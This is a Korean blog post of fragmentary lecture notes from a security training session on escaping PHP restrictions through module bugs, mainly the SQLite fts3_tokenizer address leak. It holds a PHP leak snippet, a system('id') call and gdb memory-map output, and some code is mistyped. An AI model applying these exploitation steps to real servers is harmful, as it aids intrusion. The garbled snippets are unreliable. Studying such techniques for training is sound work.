본문 바로가기
비오비

7/31 [이종호멘토님]

by sonysame 2019. 7. 31.

root //rkddlsdnr



safe mode



?><?php

system("id");

phpinfo();



mod_cgi, php-fpm

php가 사용하는 모듈에서 취약점을 찾고

CVE 2015 0273, CVE 2015 6834....

환경에 의존적, PHP버전에 의존함

환경에 덜의존적인 버그!


sqlite.so

SQLite3 fts_tokenizer함수에서 적절한 검증 없이 콜백함수 주소를 사용하여 code execution이 



<?php

$db=new SQLite3(":memory:")

$row=$db->query("select hex(fts3_tokenizer('simple')) addr;")->fetchArray();

$leaked_addr=$row['addr'];

echo $leaked_addr."\n"

?>


<?php


ob_end_flush();

flush();

ob_flush();

ob_start();

echo getmypid)_'

echo str_repeat(" ",0x1212);

ob_end_flush)_'

ob_start();


sleep(10);

?>


cd /var/www/html

curl http://localhost/test.php


service httpd restart



shell cat /proc/~/maps | grep "libsqlite"


libsqlite3.so.0.8.6의 base 주소


ext/session.php_session.h



 스택을 마음대로 쓸 수 있게 chche_limiter



shell


 shell cat /proc/2139/maps | grep "libphp"

find /g 0x7f28ee027000, +0x100000, 0x4141414142424242



(gdb) shell cat /proc/2139/maps | grep "libphp"

7f28edaf6000-7f28ede27000 r-xp 00000000 fd:00 924720                     /usr/lib64/httpd/modules/libphp5.so

7f28ede27000-7f28ee027000 ---p 00331000 fd:00 924720                     /usr/lib64/httpd/modules/libphp5.so

7f28ee027000-7f28ee07d000 rw-p 00331000 fd:00 924720                     /usr/lib64/httpd/modules/libphp5.so

(gdb) find /g 0x7f28ee027000, +0x100000, 0x4141414142424242

0x7f28ee090bb0 <ps_globals+48>

warning: Unable to access target memory at 0x7f28ee0988b8, halting search.

1 pattern found.

(gdb) x/x 0x7f28ee090bb0-7f28edaf6000

Invalid number "7f28edaf6000".

(gdb) x/x 0x7f28ee090bb0-0x7f28edaf6000

0x59abb0:       Cannot access memory at address 0x59abb0

(gdb) x/gx 0x7f28ee090bb0

0x7f28ee090bb0 <ps_globals+48>: 0x4141414142424242

(gdb) shell cat /proc/2139/maps | grep "libsqlite"

7f28e0666000-7f28e06f1000 r-xp 00000000 fd:00 788781                     /usr/lib64/libsqlite3.so.0.8.6

7f28e06f1000-7f28e08f1000 ---p 0008b000 fd:00 788781                     /usr/lib64/libsqlite3.so.0.8.6

7f28e08f1000-7f28e08f4000 rw-p 0008b000 fd:00 788781                     /usr/lib64/libsqlite3.so.0.8.6

(gdb) x/x 0x7f28edaf6000-0x7f28e0666000

0xd490000:      Cannot access memory at address 0xd490000





rbp를 쓰는건 일반적으로 leave
leave;ret중 아무거나 사용


저작자표시

'비오비' 카테고리의 다른 글

8/1  (0) 2019.08.01
8/1[신정훈멘토님]  (0) 2019.08.01
7/30 [조상현 멘토님]  (0) 2019.07.30
7/24[이기택멘토님 with rubiya]  (0) 2019.07.24
7/24 [신정훈 멘토님]  (0) 2019.07.24

관련글

티스토리툴바